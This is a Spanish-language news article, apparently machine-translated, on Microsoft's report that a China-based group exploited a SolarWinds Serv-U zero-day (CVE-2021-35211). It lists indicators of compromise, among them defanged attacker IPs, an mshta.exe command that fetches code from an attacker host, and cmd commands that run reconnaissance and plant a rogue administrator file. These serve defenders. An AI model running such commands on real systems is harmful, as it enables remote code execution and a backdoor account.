imágenes falsas
Microsoft dijo el martes que los piratas informáticos que operan en China explotaron una vulnerabilidad de día cero en un producto SolarWinds. Según Microsoft, los piratas informáticos estaban, con toda probabilidad, dirigidos a empresas de software y a la industria de defensa de EE. UU.
SolarWinds reveló el día cero el lunes, después de recibir una notificación de Microsoft de que había descubierto que una vulnerabilidad previamente desconocida en la línea de productos SolarWinds Serv-U estaba bajo explotación activa. SolarWinds, con sede en Austin, Texas, no proporcionó detalles sobre el actor de la amenaza detrás de los ataques o cómo funcionó su ataque.
VPN comerciales y enrutadores de consumidores comprometidos
El martes, Microsoft dijo que estaba designando al grupo de piratería por ahora como “DEV-0322”. “DEV” se refiere a un “grupo de desarrollo” en estudio antes de que los investigadores de Microsoft tengan una gran confianza en el origen o la identidad del actor detrás de una operación. La compañía dijo que los atacantes están ubicados físicamente en China y, a menudo, dependen de redes de bots compuestas por enrutadores u otros tipos de dispositivos de IoT.
“MSTIC ha observado que DEV-0322 apunta a entidades del sector de base industrial de defensa de EE. UU. Y empresas de software”, escribieron investigadores del Centro de inteligencia de amenazas de Microsoft en un correo. “Este grupo de actividades tiene su sede en China y se ha observado el uso de soluciones VPN comerciales y enrutadores de consumidores comprometidos en su infraestructura de atacantes”.
Más allá de los tres servidores afiliados a atacantes ya revelados por SolarWinds, Microsoft proporcionó tres indicadores adicionales que las personas pueden usar para determinar si fueron pirateados. Los indicadores de compromiso son:
- 98[.]176[.]196[.]89
- 68[.]235[.]178[.]32
- 208[.]113[.]35[.]58
- 144[.]34[.]179[.]162
- 97[.]77[.]97[.]58
- hxxp: // 144[.]34[.]179[.]162 / a
- C: Windows Temp Serv-U.bat
- C: Windows Temp test current.dmp
- La presencia de errores de excepción sospechosos, particularmente en el archivo de registro DebugSocketlog.txt
- C: Windows System32 mshta.exe http: // 144[.]34[.]179[.]162 / a (sin colmillos)
- cmd.exe / c whoami> “./Client/Common/redacted.txt”
- cmd.exe / c dir> “. Client Common redacted.txt”
- cmd.exe / c “C: Windows Temp Serv-U.bat”
- powershell.exe C: Windows Temp Serv-U.bat
- cmd.exe / c escriba \ redacted redacted.Archive> “C: ProgramData RhinoSoft Serv-U Users Global Users redacted.Archive”
La publicación del martes también proporcionó nuevos detalles técnicos sobre el ataque. Específicamente:
Observamos que DEV-0322 canaliza la salida de sus comandos cmd.exe a archivos en la carpeta Serv-U Client Common , a la que se puede acceder desde Internet de forma predeterminada, para que los atacantes puedan recuperar los resultados de los comandos. También se encontró que el actor agregó un nuevo usuario global a Serv-U, agregándose efectivamente como administrador de Serv-U, al crear manualmente un archivo .Archive diseñado en el directorio de Usuarios Globales. La información del usuario de Serv-U se almacena en estos archivos .Archive.
Debido a la forma en que DEV-0322 había escrito su código, cuando el exploit compromete con éxito el proceso de Serv-U, se genera una excepción y se registra en un archivo de registro de Serv-U, DebugSocketLog.txt. El proceso también podría fallar después de ejecutar un comando malicioso.
Al revisar la telemetría, identificamos características del exploit, pero no una vulnerabilidad de causa raíz. MSTIC trabajó con el equipo de investigación de seguridad ofensiva de Microsoft, que realizó una investigación de vulnerabilidades en el binario Serv-U e identificó la vulnerabilidad a través del análisis de caja negra. Una vez que se encontró la causa raíz, informamos de la vulnerabilidad a SolarWinds, quien respondió rápidamente para comprender el problema y crear un parche.
La vulnerabilidad de día cero, que se rastrea como CVE-2021-35211, reside en el producto Serv-U de SolarWinds, que los clientes utilizan para transferir archivos a través de las redes. Cuando el Serv-U SSH está expuesto a Internet, los exploits brindan a los atacantes la capacidad de ejecutar de forma remota código malicioso con altos privilegios del sistema. Desde allí, los atacantes pueden instalar y ejecutar cargas útiles maliciosas, o pueden ver y cambiar datos.
SolarWinds se convirtió en un nombre familiar de la noche a la mañana a fines de diciembre, cuando los investigadores descubrieron que estaba en el centro de un ataque a la cadena de suministro con alcance global. Después de comprometer el sistema de compilación de software de SolarWinds, los atacantes utilizaron su acceso para enviar una actualización maliciosa a aproximadamente 18.000 clientes de la herramienta de gestión de red Orion de la empresa.
De esos 18.000 clientes, unos nueve de ellos en agencias gubernamentales de EE. UU. Y unos 100 de ellos en la industria privada recibieron malware de seguimiento. El gobierno federal ha atribuido los ataques al Servicio de Inteligencia Exterior de Rusia, que se abrevia como SVR. Durante más de una década, SVR ha realizado campañas de malware dirigidas a gobiernos, grupos de expertos políticos y otras organizaciones de todo el mundo.
Los ataques de día cero que Microsoft descubrió e informó no están relacionados con el ataque a la cadena de suministro de Orion.
SolarWinds corrigió la vulnerabilidad durante el fin de semana. Cualquiera que ejecute una versión vulnerable de Serv-U debe actualizar de inmediato y verificar si hay signos de compromiso.